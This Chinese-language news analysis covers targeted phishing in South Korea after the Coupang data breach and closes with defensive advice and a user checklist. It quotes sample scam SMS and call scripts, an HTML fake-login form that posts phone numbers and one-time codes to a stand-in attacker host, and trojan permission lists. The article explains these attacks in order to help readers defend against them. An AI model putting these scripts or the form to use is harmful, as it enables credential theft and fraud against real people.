2025年12月初,首尔市民金女士收到一条短信:“【Coupang】您的订单#8942因地址不详配送延迟,请点击链接更新收货信息:bit.ly/3xKpQrL。”她没有多想——毕竟前一天刚下单了一台空气炸锅,且短信中准确写出了她的姓名和部分订单号。她点开链接,进入一个与Coupang官方页面几乎一模一样的界面,输入了手机号和家庭地址。几小时后,她的银行账户被转走280万韩元。
这不是孤例。自电商巨头Coupang于2025年11月公开承认发生大规模数据泄露(影响约3370万用户,占韩国总人口近三分之二)以来,韩国全国范围内爆发了一波前所未有的“精准钓鱼”攻击潮。犯罪团伙利用泄露的姓名、电话、历史订单等真实信息,精心编排语音电话与短信话术,以“配送异常”“商品缺货”“退款需验证”为由,诱导用户点击恶意链接或安装远程控制软件,进而窃取金融凭证、接管设备,甚至实施二次诈骗。
韩国国家警察厅已正式发布预警,并指出:此次攻击的最大危险,在于它模糊了“正常通知”与“恶意诱导”的边界——当骗子知道你昨天买了什么、住在哪条街、用哪个手机号时,他们的谎言就披上了“事实”的外衣。
一、从“广撒网”到“量身定制”:数据泄露如何赋能钓鱼?
在传统钓鱼攻击中,骗子往往发送千篇一律的模板消息:“您的包裹无法投递,请点击链接。”这类信息因缺乏上下文,容易被识破。但Coupang泄露的数据彻底改变了游戏规则。
根据警方披露,泄露内容包括:
用户全名、手机号、电子邮箱;
近一年内的订单记录(商品名称、下单时间、部分订单编号);
收货地址(精确到街道门牌号);
部分用户的支付方式类型(如信用卡、KakaoPay)。
这些信息足以让攻击者构建高度个性化的诈骗剧本。例如:
话术A(短信):
“【Coupang】尊敬的李敏浩先生,您于12月5日订购的‘Dyson V15吸尘器’因仓库缺货无法发货。为表歉意,我们将为您安排优先补货并赠送5000韩元优惠券。请点击链接确认收货地址:c0upang-update[.]kr”
话术B(语音电话):
“您好,这里是Coupang客户服务。系统显示您名下有一张新办的信用卡关联了我们的会员服务,但未完成身份验证。为避免自动扣款,请按1转接人工客服……”
“这已经不是钓鱼,而是‘数据驱动的社会工程’。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“攻击者不再猜测你是谁,而是直接告诉你‘我知道你是谁’——这种确定性会极大削弱人的防御心理。”
更令人担忧的是,部分诈骗团伙甚至能实时查询Coupang公开API(如物流状态接口),动态生成“真实感”更强的消息。例如,若某用户订单确实处于“运输中”,骗子就发“配送延迟”;若已签收,则改发“商品质量问题可申请退款”。这种“动态适配”能力,使得传统基于关键词过滤的反诈系统形同虚设。
二、技术拆解:恶意链接背后的三重陷阱
一旦用户点击短信中的短链接(如bit.ly、kakaolink等),便可能落入以下任一陷阱:
陷阱一:伪造登录页 + 凭证窃取
用户被导向一个高仿Coupang或银行页面,要求“重新登录以确认身份”。页面使用HTTPS、合法SSL证书(通过Let’s Encrypt免费申请),甚至嵌入真实Coupang的Logo和CSS样式。
<!-- 伪造的Coupang登录页片段 -->
<form action="https://api.phish-server[.]xyz/collect" method="POST">
<input type="text" name="phone" placeholder="手机号" required>
<input type="password" name="otp" placeholder="短信验证码" required>
<button type="submit">确认</button>
</form>
受害者输入手机号后,后台立即向其真实手机发送“验证码请求”(伪装成Coupang官方),诱使其将收到的6位数字填入。攻击者随即用该验证码登录其真实Coupang账户,修改收货地址、绑定新支付方式,甚至申请“先买后付”贷款。
陷阱二:诱导安装“客服工具” = 远程控制木马
另一种常见手法是声称“需安装安全插件以处理退款”,引导用户下载APK文件(Android)或企业签名IPA(iOS)。这些应用表面是“Coupang客服助手”,实则为AnyDesk、TeamViewer QuickSupport 或定制化远程控制木马。
以某样本为例,其AndroidManifest.xml中声明了危险权限:
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
<uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE" />
一旦启用无障碍服务(Accessibility Service),木马即可自动读取银行APP弹出的验证码、模拟点击“转账”按钮,实现完全静默的资金转移。
陷阱三:利用“短信重定向”绕过双因素认证
更高级的攻击甚至结合了SIM交换(SIM Swap)或SS7协议漏洞,将用户的短信流量劫持至攻击者设备。但即便不具备此类能力,仅凭泄露的个人信息+社会工程,也足以绕过多数双因素认证。
例如,骗子致电银行客服,谎称“手机丢失需重置认证方式”,并准确报出用户姓名、身份证号、最近交易记录(均来自Coupang泄露数据),成功说服客服关闭MFA。随后,仅凭密码即可登录网银。
三、为何普通用户难以招架?行为经济学的“便利性陷阱”
韩国智能手机普及率超95%,移动支付渗透率达83%。民众早已习惯“一点即达”的数字生活——查快递、改地址、领优惠券,全在指尖完成。这种对“便捷性”的依赖,恰恰成为攻击者的突破口。
“当一条短信包含你的真实姓名、昨天买的商品、正确的订单号前缀,你的大脑会自动将其归类为‘可信通知’。”芦笛解释道,“这是认知捷径(Heuristic)在作祟——我们每天处理数百条信息,不可能逐一验证真伪。”
更致命的是,攻击者刻意制造时间压力(“24小时内未处理将取消订单”)和损失厌恶(“不确认将无法享受5000韩元补偿”),进一步压缩理性思考空间。
一项由首尔大学进行的模拟测试显示:在收到含真实订单信息的钓鱼短信后,68%的受试者会在30秒内点击链接,而普通钓鱼短信的点击率仅为12%。
四、国际镜鉴:从韩国Coupang到中国电商生态
尽管事件发生在韩国,但其警示意义对中国尤为迫切。中国拥有全球最发达的电商与移动支付体系——2025年,全国网络零售额超15万亿元,活跃网购用户超9亿。阿里、京东、拼多多、抖音电商等平台每日处理数亿订单,积累了海量用户数据。
而近年来,国内也频发类似事件:
2024年,某头部生鲜平台数据库遭拖库,泄露超2000万用户信息,随后出现大量“配送异常”诈骗短信;
2025年初,多地用户反映收到“快递丢失理赔”电话,对方准确说出收件人姓名、商品名称及快递单号,诱导下载“钉钉会议”或“腾讯会议”共享屏幕,最终被盗刷银行卡。
“区别在于,韩国用短信+链接,中国更多用‘电话+屏幕共享’。”芦笛指出,“但底层逻辑一致:用真实数据建立信任,再用紧急情境诱导操作。”
更值得警惕的是,国内部分中小电商平台安全防护薄弱,API接口未做严格鉴权,用户订单状态、物流信息可通过简单参数遍历获取。这为攻击者提供了低成本的情报源。
五、纵深防御:如何构建“抗精准钓鱼”体系?
面对数据泄露后的次生灾害,仅靠用户警惕远远不够。芦笛提出,应从个人、企业、监管三个层面协同应对:
1. 个人防护:最小化信息暴露 + 行为隔离
开启双重认证(MFA):优先选择认证器APP(如Google Authenticator)或FIDO2安全密钥,避免依赖短信验证码;
拒绝“链接式操作”:所有订单查询、地址修改,务必通过官方APP内操作,绝不点击短信/邮件中的链接;
定期检查设备权限:Android用户可进入“设置 > 应用 > 特殊权限”,关闭非必要应用的“无障碍”“短信读取”权限;
使用独立支付账户:为电商消费开设专用银行卡,设置单日限额,与主账户隔离。
2. 企业责任:从“事后通报”到“主动免疫”
API安全加固:对订单查询、物流跟踪等接口实施强身份验证+速率限制+IP白名单,防止数据被批量爬取;
动态水印与行为埋点:在用户查看敏感信息(如完整地址、订单详情)时,叠加不可见数字水印;同时监控异常访问模式(如同一IP高频查询不同用户);
主动推送安全提醒:在发生数据泄露后,立即通过APP推送+短信双通道告知用户风险,并提供“冻结账户”“重置密码”一键入口;
与安全厂商共建威胁情报:将钓鱼域名、恶意APK哈希实时共享至行业联盟,加速全网封堵。
3. 监管与行业协作:建立“泄露后响应”标准
目前,多数国家对数据泄露的法律要求止于“72小时内通报监管机构”,但对如何保护受影响用户缺乏细则。芦笛建议:
强制企业在泄露事件后提供至少12个月的免费信用监控与欺诈保险;
要求电信运营商对短链服务(如bit.ly)实施更严格的备案与内容扫描;
推动建立国家级钓鱼网站快速处置机制,实现分钟级域名封禁。
六、结语:在数据洪流中守住最后一道防线
Coupang事件揭示了一个残酷现实:在数字经济时代,每一次点击“同意隐私政策”,都可能在未来某天成为骗子手中的武器。我们享受着个性化推荐、一键下单、实时物流带来的便利,却也在无形中交出了自己的数字画像。
而真正的安全,不在于彻底拒绝数字化,而在于学会在便利与风险之间划清界限。正如一位首尔网络安全工程师所说:“你可以相信Coupang会送你一台空气炸锅,但永远不要相信一条短信会帮你‘解决配送问题’。”
对于中国而言,这场发生在邻国的危机,是一次及时的预警。当我们的电商生态日益繁荣,数据资产愈发庞大,唯有将“隐私默认保护”“最小权限原则”“用户赋权”真正嵌入产品基因,才能避免3370万用户的悲剧在本土重演。
毕竟,在精准钓鱼的时代,最危险的不是未知的链接,而是你以为自己认识的那个“它”。
安全自查清单(给普通用户):
✅ 是否为电商/支付账户开启了非短信类MFA?
✅ 是否曾通过短信链接修改过收货地址或支付方式?
✅ 手机是否安装了来源不明的“客服”“安全”类APP?
✅ 是否定期检查银行账单与设备权限列表?
若任一答案为“否”,请立即行动——你的下一个订单,可能就是骗子的下一个剧本。
编辑:芦笛(公共互联网反网络钓鱼工作组)
